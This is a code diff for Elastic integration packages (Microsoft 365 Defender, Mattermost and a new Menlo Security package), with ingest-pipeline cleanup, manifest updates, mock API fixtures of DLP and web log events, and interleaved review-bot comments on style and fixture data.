@@ -1,16 +1,16 @@ { "attributes": { "columns": [ - "m365_defender.incident.alert.title", - "m365_defender.incident.alert.severity", - "m365_defender.incident.alert.id", "event.id", - "m365_defender.incident.alert.status", - "m365_defender.incident.alert.assigned_to" + "m365_defender.alert.title", + "event.severity", + "m365_defender.alert.status", + "source.user.name" ], "description": "", "grid": {}, "hideChart": false, + "isTextBasedQuery": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -25,13 +25,13 @@ "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -49,10 +49,12 @@ "desc" ] ], - "title": "Alerts Essential Details [Logs Microsoft 365 Defender]" + "timeRestore": false, + "title": "Alerts Essential Details [Logs Microsoft 365 Defender]", + "usesAdHocDataView": false }, "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-04T07:50:09.615Z", + "created_at": "2024-01-22T11:45:09.140Z", "id": "m365_defender-989afc60-44a5-11ed-8375-0168a9970c06", "migrationVersion": { "search": "8.0.0" diff --git a/packages/m365_defender/kibana/search/m365_defender-fcf25960-44af-11ed-8375-0168a9970c06.json b/packages/m365_defender/kibana/search/m365_defender-fcf25960-44af-11ed-8375-0168a9970c06.json index 826d862b554..69786e318c4 100644 --- a/packages/m365_defender/kibana/search/m365_defender-fcf25960-44af-11ed-8375-0168a9970c06.json +++ b/packages/m365_defender/kibana/search/m365_defender-fcf25960-44af-11ed-8375-0168a9970c06.json 
@@ -52,7 +52,7 @@ "title": "Incidents Essential Details [Logs Microsoft 365 Defender]" }, "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-04T07:50:09.615Z", + "created_at": "2024-01-22T11:45:09.140Z", "id": "m365_defender-fcf25960-44af-11ed-8375-0168a9970c06", "migrationVersion": { "search": "8.0.0" diff --git a/packages/m365_defender/manifest.yml b/packages/m365_defender/manifest.yml index 794daa83ad5..10900ecf444 100644 --- a/packages/m365_defender/manifest.yml +++ b/packages/m365_defender/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: m365_defender title: Microsoft M365 Defender -version: "2.6.2" +version: "2.8.0" description: Collect logs from Microsoft M365 Defender with Elastic Agent. categories: - "security" @@ -11,7 +11,7 @@ conditions: elastic: subscription: basic kibana: - version: ^8.7.1 + version: ^8.12.0 policy_templates: - name: m365_defender title: M365 Defender Logs @@ -35,6 +35,7 @@ policy_templates: show_user: false default: oauth2/v2.0/token description: "Microsoft supports multiple Oauth2 URL endpoints, the default is oauth2/v2.0/token, but can also be oauth2/token" + secret: false - name: enable_request_tracer type: bool title: Enable request tracing @@ -50,12 +51,13 @@ policy_templates: required: true show_user: true - name: client_secret - type: text + type: password title: Client Secret description: The secret related to the client ID. multi: false required: true show_user: true + secret: true - name: tenant_id type: text title: Tenant ID 
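Review bot: `client_secret` becoming `type: password` with `secret: true` is the right hardening, but nothing in the manifest records that it depends on the `kibana.version: ^8.12.0` bump made in the `@@ -11,7 +11,7 @@` hunk on this same line, which appears to be what provides secret storage for integration variables; a later edit relaxing the constraint would silently break installation. A one-line comment beside the new flag, `# secret: true relies on Fleet secret storage; keep conditions.kibana.version in step`, would make the coupling visible. The explicit `secret: false` added to the OAuth2 endpoint variable in the `@@ -35,6 +35,7 @@` hunk is fine, since the token URL is not sensitive, though the variable's `name:` line sits outside the hunk so its identity is inferred.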
@@ -108,11 +110,11 @@ icons: size: 32x32 type: image/svg+xml screenshots: - - src: /img/m365-defender-incident-alert1.png - title: Microsoft 365 Defender (Incidents) Alerts Dashboard + - src: /img/m365-defender-alert.png + title: Microsoft 365 Defender Alert Dashboard size: 600x600 type: image/png - - src: /img/m365-defender-incidents-incidents1.png + - src: /img/m365-defender-incidents.png title: Microsoft 365 Defender (Incidents) Incidents Dashboard size: 600x600 type: image/png diff --git a/packages/mattermost/_dev/deploy/docker/sample_logs/audit.log b/packages/mattermost/_dev/deploy/docker/sample_logs/audit.log index 80e2d366a55..6c02a837cf8 100644 --- a/packages/mattermost/_dev/deploy/docker/sample_logs/audit.log +++ b/packages/mattermost/_dev/deploy/docker/sample_logs/audit.log 
@@ -2,4 +2,4 @@ {"timestamp":"2021-12-04 23:19:48.599 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"172.19.0.1","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} {"timestamp":"2021-12-04 23:19:51.324 Z","event":"Logout","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"172.19.0.1","api_path":"/api/v4/users/logout","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} {"timestamp":"2021-12-04 23:19:58.729 Z","event":"login","status":"success","user_id":"","session_id":"","ip_address":"172.19.0.1","api_path":"/api/v4/users/login","device_id":"","login_id":"admin","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-04 23:20:33.027 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"172.19.0.1","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} \ No newline at end of file +{"timestamp":"2021-12-04 23:20:33.027 
Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"172.19.0.1","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} diff --git a/packages/mattermost/changelog.yml b/packages/mattermost/changelog.yml index 7b3197f3b96..49508cac48a 100644 --- a/packages/mattermost/changelog.yml +++ b/packages/mattermost/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 +- version: "1.17.3" + changes: + - description: Clean up null handling and Painless scripts + type: bugfix + link: https://github.com/elastic/integrations/pull/9177 - version: "1.17.2" changes: - description: Changed owners diff --git a/packages/mattermost/data_stream/audit/_dev/test/system/test-default-config.yml b/packages/mattermost/data_stream/audit/_dev/test/system/test-default-config.yml index 4752c5f892f..6ad78fdf904 100644 --- a/packages/mattermost/data_stream/audit/_dev/test/system/test-default-config.yml +++ b/packages/mattermost/data_stream/audit/_dev/test/system/test-default-config.yml @@ -5,3 +5,5 @@ data_stream: paths: - "{{SERVICE_LOGS_DIR}}/*.log" preserve_original_event: true +assert: + hit_count: 5 diff --git a/packages/mattermost/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/mattermost/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index eba5ba9e785..13ce825b45c 100644 --- a/packages/mattermost/data_stream/audit/elasticsearch/ingest_pipeline/default.yml 
+++ b/packages/mattermost/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -12,6 +12,9 @@ processors: - json: field: event.original target_field: json + - fail: + if: "!(ctx.json instanceof Map)" + message: Missing JSON object - date: field: json.timestamp formats: @@ -30,7 +33,7 @@ processors: field: json.errors target_field: mattermost.audit.error.message ignore_missing: true - if: ctx.json?.errors != "[]" + if: ctx.json.errors != "[]" - gsub: field: mattermost.audit.error.message pattern: "(\\[|\\])" @@ -44,15 +47,15 @@ processors: - set: field: event.outcome value: success - if: ctx.json?.status == "success" + if: ctx.json.status == "success" - set: field: event.outcome value: failure - if: ctx.json?.status == "fail" || ctx.mattermost?.audit?.error?.message != null + if: ctx.json.status == "fail" || ctx.mattermost?.audit?.error?.message != null - set: field: event.outcome value: unknown - if: ctx.event?.outcome == null + if: ctx.event.outcome == null - rename: field: json.user_id target_field: user.id 
@@ -308,63 +311,53 @@ processors: - group - change source: >- - ctx.event.kind = 'event'; ctx.event.category = ['configuration']; ctx.event.type = ['info']; if (ctx?.event?.action == null) { - - + ctx.event.kind = 'event'; + ctx.event.category = ['configuration']; + ctx.event.type = ['info']; + if (ctx.event.action == null) { return; - } if (params.get(ctx.event.action) == null) { - - + } + if (params.get(ctx.event.action) == null) { return; - } def hm = new HashMap(params.get(ctx.event.action)); hm.forEach((k, v) -> ctx.event[k] = v); + } + def hm = new HashMap(params.get(ctx.event.action)); + hm.forEach((k, v) -> ctx.event[k] = v); - script: lang: painless description: Add ECS User fields - if: "ctx.event?.category.contains('iam')" + if: ctx.event.category.contains('iam') source: >- - if (ctx?.event?.action == null) { - - + if (ctx.event.action == null) { return; - } if (ctx.group == null) { - - + } + if (ctx.group == null) { Map map = new HashMap(); ctx.put("group", map); - } if (ctx.user == null) { - - + } + if (ctx.user == null) { Map map = new HashMap(); ctx.put("user", map); - } if (ctx.user?.target == null) { - - + } + if (ctx.user.target == null) { Map map = new HashMap(); ctx.user.put("target", map); - } if (ctx.user?.changes == null) { - - + } + if (ctx.user.changes == null) { Map map = new HashMap(); ctx.user.put("changes", map); - } if (ctx.user?.target?.group == null) { - - + } + if (ctx.user.target.group == null) { Map map = new HashMap(); ctx.user.target.put("group", map); - } if(['patchUser'].contains(ctx.event.action)) { - - - if(ctx.user?.target?.name != ctx.mattermost?.audit?.patch?.name) { + } + if (['patchUser'].contains(ctx.event.action)) { + if(ctx.user.target.name != ctx.mattermost?.audit?.patch?.name) { ctx.user.changes.put("name", ctx.mattermost?.audit?.patch?.name); } - } if(['createTeam','patchTeam','deleteTeam'].contains(ctx.event.action)) { - - + } else if (['createTeam','patchTeam','deleteTeam'].contains(ctx.event.action)) { 
ctx.group.put("name", ctx.mattermost?.audit?.team?.name); ctx.group.put("id", ctx.mattermost?.audit?.team?.id); - } if(['addTeamMembers','removeTeamMember'].contains(ctx.event.action)) { - - + } else if (['addTeamMembers','removeTeamMember'].contains(ctx.event.action)) { ctx.user.target.group.put("name", ctx.mattermost?.audit?.team?.name); ctx.user.target.group.put("id", ctx.mattermost?.audit?.team?.id); } @@ -387,7 +380,7 @@ processors: field: related.user value: '{{user.target.id}}' allow_duplicates: false - if: ctx.user?.target?.id != null && ctx.user.target.id instanceof String + if: ctx.user?.target?.id instanceof String - foreach: field: user.target.id processor: @@ -396,7 +389,7 @@ processors: value: '{{_ingest._value}}' allow_duplicates: false ignore_missing: true - if: ctx.user?.target?.id != null && ctx.user.target.id instanceof List + if: ctx.user?.target?.id instanceof List - append: field: related.ip value: '{{source.ip}}' @@ -423,7 +416,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/mattermost/manifest.yml b/packages/mattermost/manifest.yml index 46bf799973e..d2ba2cade86 100644 --- a/packages/mattermost/manifest.yml +++ b/packages/mattermost/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: mattermost title: "Mattermost" -version: "1.17.2" +version: "1.18.0" description: Collect logs from Mattermost with Elastic Agent. type: integration categories: diff --git a/packages/menlo/_dev/build/build.yml b/packages/menlo/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/menlo/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" 
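Review bot: In the `Add ECS User fields` script the nested `if(ctx.user.target.name != ctx.mattermost?.audit?.patch?.name) {` keeps the no-space `if(` form while every sibling condition in this same rewrite was normalized to `if (`; `if (ctx.user.target.name != ctx.mattermost?.audit?.patch?.name) {` would finish the cleanup, and the single-element `['patchUser'].contains(ctx.event.action)` reads more plainly as `ctx.event.action == 'patchUser'`. The processor's condition also dropped its null-safe operator (`if: ctx.event.category.contains('iam')`), which is only safe because the preceding script assigns `ctx.event.category = ['configuration']` before any of its `return`s — assuming that script carries no `if:` of its own, as its header lies outside the hunk. A short comment on the condition, `# event.category is always set by the previous script`, would record that ordering dependency for the next maintainer. The hunk begins on the previous line, so the first script's `params` and `if:` are not visible here.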
diff --git a/packages/menlo/_dev/build/docs/README.md b/packages/menlo/_dev/build/docs/README.md new file mode 100644 index 00000000000..a6e7b688556 --- /dev/null +++ b/packages/menlo/_dev/build/docs/README.md @@ -0,0 +1,52 @@ +# Menlo Security + +Menlo Security’s isolation-centric approach splits web browsing and document retrieval between the user’s device and an isolated, Disposable Virtual Container (DVC) away from the endpoint. All risky code is executed in the isolated DVC and never reaches the endpoint. Only safe display data is sent to the user’s browser. User traffic is automatically sent to this infrastructure without any impact on the users themselves. + +## Web + +Menlo Security's cloud based Browser Security prevents phishing and malware attacks on any browser and any device across your hybrid enterprise. + +## DLP + +Data Loss Prevention (also known as Data Leak Prevention) detects potential data breaches or data ex-filtration transmissions and prevents them by detecting and optionally blocking sensitive data passing through the Menlo Security platform. + +## Compatibility + +This module has been tested against the Menlo Security API **version 2.0** + +## Data streams + +The Menlo Security integration collects data for the following two events: + +| Event Type | +|-------------------------------| +| Web | +| DLP | + +## Setup + +To collect data through the REST API you will need your Menlo Security API URL and an API token. + +The API token to collect logs must have the *Log Export API* permission + +## Logs Reference + +### Web + +This is the `Web` dataset. + +#### Example + +{{ event "web" }} + +{{ fields "web" }} + +### DLP + +This is the `DLP` dataset. + +#### Example + +{{ event "dlp" }} + +{{ fields "dlp" }} diff --git a/packages/menlo/_dev/deploy/docker/config.yml b/packages/menlo/_dev/deploy/docker/config.yml new file mode 100644 index 00000000000..16e171cb46e --- /dev/null +++ b/packages/menlo/_dev/deploy/docker/config.yml 
@@ -0,0 +1,430 @@ +rules: + - path: "/api/rep/v1/fetch/client_select" + methods: [POST] + request_body: '{"log_type":"dlp","pagingIdentifiers":{},"token":"xxxx"}' + query_params: + limit: 2 + format: "json" + start: "{start:.*}" + end: "{end:.*}" + responses: + - status_code: 200 + body: | + [ + { + "timestamp": "2023-11-21T13:12:37.102Z", + "result": { + "pagingIdentifiers": { + "next_time": "2023-11-21T13:12:44.384Z", + "hashes": { + "2d2a6dcedb5dbc122c36e4ec980410c6": 0 + } + }, + "events": [ + { + "event": { + "dst_url": "http://tinynewupload.com/", + "user_input": "false", + "protocol": "http", + "file_type": "CSV", + "domain": "tinynewupload.com", + "alerted": "false", + "ccl_ids": "CreditordebitcardnumbersGlobal", + "severity": "5", + "event_time": "2020-03-09T17:17:22.227000", + "event_id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "filename": "more_credit_cards.csv", + "version": "2.0", + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a", + "status": "dirty", + "product": "MSIP", + "ccl_match_counts": "1", + "vendor": "Menlo Security", + "ccl_scores": "1", + "rule_name": "Credit card block rule", + "request_type": "GET", + "src_url": "http://tinynewupload.com/", + "categories": "Download Sites", + "stream_name": "/safefile-input/working_file", + "name": "file_upload", + "userid": "admin@menlosecurity.com", + "action": "block", + "rule_id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099" + } + }, + { + "event": { + "dst_url": "http://tinynewupload.com/", + "user_input": "false", + "protocol": "http", + "file_type": "CSV", + "domain": "tinynewupload.com", + "alerted": "false", + "ccl_ids": "CreditordebitcardnumbersGlobal", + "severity": "5", + "event_time": "2020-03-09T17:19:22.227000", + "event_id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "filename": "phone_numbers.csv", + "version": "2.0", + "sha256": "fd1aee671d92ab30f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a", + "status": 
"dirty", + "product": "MSIP", + "ccl_match_counts": "1", + "vendor": "Menlo Security", + "ccl_scores": "1", + "rule_name": "Phone number block rule", + "request_type": "GET", + "src_url": "http://tinynewupload.com/", + "categories": "Download Sites", + "stream_name": "/safefile-input/working_file", + "name": "file_upload", + "userid": "admin@menlosecurity.com", + "action": "block", + "rule_id": "1f3ef32c-ec62-42fb-8cad-e1fe13375099" + } + } + ] + } + } + ] + - path: "/api/rep/v1/fetch/client_select" + methods: [POST] + request_body: '{"log_type":"dlp","pagingIdentifiers":{"hashes":{"2d2a6dcedb5dbc122c36e4ec980410c6":0},"next_time":"2023-11-21T13:12:44.384Z"},"token":"xxxx"}' + query_params: + limit: 2 + format: "json" + start: "{start:.*}" + end: "{end:.*}" + responses: + - status_code: 200 + body: | + [ + { + "timestamp": "2023-11-21T13:12:37.102Z", + "result": { + "pagingIdentifiers": { + "next_time": "2023-11-21T19:12:44.384Z", + "hashes": { + "2d2a6dcedb5dbc122c36e4ec980410c6": 0 + }, + "last_iteration": true + }, + "events": [ + { + "event": { + "dst_url": "http://tinyupload.com/", + "user_input": "false", + "protocol": "http", + "file_type": "CSV", + "domain": "tinyupload.com", + "alerted": "false", + "ccl_ids": "CreditordebitcardnumbersGlobal", + "severity": "5", + "event_time": "2020-03-09T17:16:22.227000", + "event_id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "filename": "credit_cards.csv", + "version": "2.0", + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a", + "status": "dirty", + "product": "MSIP", + "ccl_match_counts": "1", + "vendor": "Menlo Security", + "ccl_scores": "1", + "rule_name": "Credit card block rule", + "request_type": "GET", + "src_url": "http://tinyupload.com/", + "categories": "Download Sites", + "stream_name": "/safefile-input/working_file", + "name": "file_upload", + "userid": "admin@menlosecurity.com", + "action": "block", + "rule_id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099" + 
} + }, + { + "event": { + "dst_url": "http://tinyyupload.com/", + "user_input": "false", + "protocol": "http", + "file_type": "CSV", + "domain": "tinyyupload.com", + "alerted": "false", + "ccl_ids": "CreditordebitcardnumbersGlobal", + "severity": "5", + "event_time": "2020-03-09T17:16:22.227000", + "event_id": "a4c2161b3f81a287e146d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "filename": "creditt_cards.csv", + "version": "2.0", + "sha256": "fd1aee671d92ab35f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a", + "status": "dirty", + "product": "MSIP", + "ccl_match_counts": "1", + "vendor": "Menlo Security", + "ccl_scores": "1", + "rule_name": "Credit card block rule", + "request_type": "GET", + "src_url": "http://tinyyupload.com/", + "categories": "Download Sites", + "stream_name": "/safefile-input/working_file", + "name": "file_upload", + "userid": "admin@menlosecurity.com", + "action": "block", + "rule_id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099" + } + } + ] + } + } + ] + - path: /api/rep/v1/fetch/client_select + methods: [POST] + request_body: '{"log_type":"web","pagingIdentifiers":{},"token":"xxxx"}' + query_params: + limit: 2 + format: "json" + start: "{start:.*}" + end: "{end:.*}" + responses: + - status_code: 200 + body: | + [ + { + "timestamp": "2023-11-21T13:12:37.102Z", + "result": { + "pagingIdentifiers": { + "next_time": "2023-11-21T13:12:44.384Z", + "hashes": { + "2d2a6dcedb5dbc122c36e4ec980410c6": 0 + } + }, + "events": [ + { + "event": { + "top_url": "http://elastic.co/", + "egress_country": "US", + "domain": "elastic.co", + "protocol": "http", + "risk_tally": "-1", + "is_iframe": "false", + "origin_ip": "192.18.1.1", + "has_password": "false", + "file_size": "NA", + "browser_and_version": "Chrome_119", + "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "egress_ip": "192.18.1.2", + "sandboxActivity": "NA", + "event_time": "2023-11-21T13:12:37.102000", + "dst": 
"192.18.1.1", + "filename": "NA", + "risk_score": "low", + "version": "2.0", + "pe_rulename": "Business and Economy Category", + "soph_dlp_ref": "NA", + "numSubfiles": "0", + "xff_ip": "NA", + "product": "MSIP", + "origin_country": "US", + "vendor": "Menlo Security", + "rendering_mode": "ACR1", + "inconsistent_domain": "false", + "x-client-country": "US", + "sandboxResult": "NA", + "request_type": "GET", + "fullScanResult": "NA", + "tab_id": "1", + "pe_reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "categories": "Business and Economy", + "x-client-ip": "192.18.1.3", + "name": "page_request", + "url": "http://elastic.co/", + "region": "us-east-1c", + "userid": "example_user", + "magicName": "NA", + "ua_type": "supported_browser", + "content-type": "text/html; charset=UTF-8", + "response_code": "308" + } + }, + { + "event": { + "top_url": "https://elastic.co/", + "egress_country": "US", + "domain": "elastic.co", + "protocol": "https", + "risk_tally": "-1", + "is_iframe": "false", + "origin_ip": "192.18.1.1", + "has_password": "false", + "file_size": "NA", + "browser_and_version": "Chrome_119", + "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "egress_ip": "192.18.1.2", + "sandboxActivity": "NA", + "event_time": "2023-11-21T13:12:37.132000", + "full_session_id": "nLxXe_iU-1", + "dst": "192.18.1.1", + "filename": "NA", + "risk_score": "low", + "version": "2.0", + "pe_rulename": "Business and Economy Category", + "soph_dlp_ref": "NA", + "numSubfiles": "0", + "xff_ip": "NA", + "product": "MSIP", + "origin_country": "US", + "vendor": "Menlo Security", + "rendering_mode": "ACR1", + "inconsistent_domain": "false", + "x-client-country": "US", + "sandboxResult": "NA", + "request_type": "GET", + "referer": "http://elastic.co/", + "fullScanResult": "NA", + "tab_id": "1", + "pe_reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "categories": "Business and Economy", + "severity": "5", + 
"x-client-ip": "192.18.1.3", + "name": "page_request", + "url": "https://elastic.co/", + "region": "us-east-1c", + "userid": "example_user", + "magicName": "NA", + "pe_action": "isolate", + "ua_type": "supported_browser", + "response_code": "301" + } + } + ] + } + } + ] + - path: /api/rep/v1/fetch/client_select + methods: [POST] + request_body: '{"log_type":"web","pagingIdentifiers":{"hashes":{"2d2a6dcedb5dbc122c36e4ec980410c6":0},"next_time":"2023-11-21T13:12:44.384Z"},"token":"xxxx"}' + query_params: + limit: 2 + format: "json" + start: "{start:.*}" + end: "{end:.*}" + responses: + - status_code: 200 + body: | + [ + { + "timestamp": "2023-11-21T13:12:37.102Z", + "result": { + "pagingIdentifiers": { + "next_time": "2023-11-21T13:13:44.384Z", + "hashes": { + "2d2a6dcedb5dbc122c36e4ec981410c6": 0 + }, + "last_iteration": true + }, + "events": [ + { + "event": { + "top_url": "https://www.elastic.co/", + "egress_country": "US", + "domain": "www.elastic.co", + "protocol": "https", + "risk_tally": "-1", + "is_iframe": "false", + "origin_ip": "192.18.1.4", + "has_password": "false", + "file_size": "NA", + "browser_and_version": "Chrome_119", + "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "egress_ip": "192.18.1.2", + "sandboxActivity": "NA", + "event_time": "2023-11-21T13:12:37.207000", + "full_session_id": "nLxXe_iU-1", + "dst": "192.18.1.4", + "filename": "NA", + "risk_score": "low", + "version": "2.0", + "pe_rulename": "Business and Economy Category", + "soph_dlp_ref": "NA", + "numSubfiles": "0", + "xff_ip": "NA", + "product": "MSIP", + "origin_country": "US", + "vendor": "Menlo Security", + "rendering_mode": "ACR1", + "inconsistent_domain": "false", + "x-client-country": "US", + "sandboxResult": "NA", + "request_type": "GET", + "referer": "http://elastic.co/", + "fullScanResult": "NA", + "tab_id": "1", + "pe_reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "categories": 
"Business and Economy", + "severity": "5", + "x-client-ip": "192.18.1.3", + "name": "page_request", + "url": "https://www.elastic.co/", + "region": "us-east-1c", + "userid": "example_user", + "magicName": "NA", + "pe_action": "isolate", + "ua_type": "supported_browser", + "content-type": "text/html; charset=utf-8", + "response_code": "200" + } + }, + { + "event": { + "top_url": "https://www.elastic.co/blog", + "egress_country": "US", + "domain": "www.elastic.co", + "protocol": "https", + "risk_tally": "-1", + "is_iframe": "false", + "origin_ip": "192.18.1.4", + "has_password": "false", + "file_size": "NA", + "browser_and_version": "Chrome_119", + "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "egress_ip": "192.18.1.2", + "sandboxActivity": "NA", + "event_time": "2023-11-21T13:12:44.384000", + "full_session_id": "nLxXe_iU-13", + "dst": "146.75.38.217", + "filename": "NA", + "risk_score": "low", + "version": "2.0", + "pe_rulename": "Business and Economy Category", + "soph_dlp_ref": "NA", + "numSubfiles": "0", + "xff_ip": "NA", + "product": "MSIP", + "origin_country": "US", + "vendor": "Menlo Security", + "rendering_mode": "ACR1", + "inconsistent_domain": "false", + "x-client-country": "US", + "sandboxResult": "NA", + "request_type": "GET", + "referer": "https://www.elastic.co/", + "fullScanResult": "NA", + "tab_id": "1", + "pe_reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "categories": "Business and Economy", + "severity": "5", + "x-client-ip": "192.18.1.3", + "name": "page_request", + "url": "https://www.elastic.co/blog", + "region": "us-east-1c", + "userid": "example_user", + "magicName": "NA", + "pe_action": "isolate", + "ua_type": "supported_browser", + "content-type": "text/html; charset=utf-8", + "response_code": "200" + } + } + ] + } + } + ] 
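Review bot: The web fixture fills `origin_ip`, `egress_ip`, `x-client-ip` and `dst` with addresses from routable space (`192.18.1.1`–`192.18.1.4`, and `146.75.38.217` in the `www.elastic.co/blog` event); 192.18.0.0/15 is not one of the RFC 5737 documentation ranges, so the sample data and the system test index IPs that resolve to real networks. Move the fixture to `192.0.2.x`, `198.51.100.x` or `203.0.113.x` so it is unambiguously synthetic, and regenerate any expected output that depends on these values. The DLP fixture also reuses the same `event_id` for the distinct `more_credit_cards.csv`, `phone_numbers.csv` and `credit_cards.csv` events; if `event.id` is ever used for deduplication downstream this fixture would not exercise that path, so giving each event a unique id looks worthwhile.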
diff --git a/packages/menlo/_dev/deploy/docker/docker-compose.yml b/packages/menlo/_dev/deploy/docker/docker-compose.yml
new file mode 100644
index 00000000000..eb800ded4c3
--- /dev/null
+++ b/packages/menlo/_dev/deploy/docker/docker-compose.yml
@@ -0,0 +1,15 @@
+version: '3.0'
+services:
+ menlo:
+ image: docker.elastic.co/observability/stream:v0.10.0
+ hostname: menlosecurity
+ ports:
+ - 8080
+ volumes:
+ - ./config.yml:/config.yml
+ environment:
+ PORT: '8080'
+ command:
+ - http-server
+ - --addr=:8080
+ - --config=/config.yml
diff --git a/packages/menlo/changelog.yml b/packages/menlo/changelog.yml
new file mode 100644
index 00000000000..999a197f0ea
--- /dev/null
+++ b/packages/menlo/changelog.yml
@@ -0,0 +1,6 @@
+# newer versions go on top
+- version: "0.1.0"
+ changes:
+ - description: Initial draft of the package
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9315
diff --git a/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-common-config.yml b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..4da22641654
--- /dev/null
+++ b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,3 @@
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log
new file mode 100644
index 00000000000..01eff5b7b65
--- /dev/null
+++ b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log
@@ -0,0 +1 @@
+{"event":{"dst_url":"http://tinyupload.com/","user_input":"false","protocol":"http","file_type":"CSV","domain":"tinyupload.com","alerted":"false","ccl_ids":"CreditordebitcardnumbersGlobal","severity":"5","event_time":"2020-03-09T17:16:22.227000","event_id":"a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce","filename":"credit_cards.csv","version":"2.0","sha256":"fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a","status":"dirty","product":"MSIP","ccl_match_counts":"1","vendor":"Menlo Security","ccl_scores":"1","rule_name":"Credit card block rule","request_type":"GET","src_url":"http://tinyupload.com/","categories":"Download Sites","stream_name":"/safefile-input/working_file","name":"file_upload","userid":"admin@menlosecurity.com","action":"block","rule_id":"1f3ef32c-ec62-42fb-8cad-e1fee3375099"}}
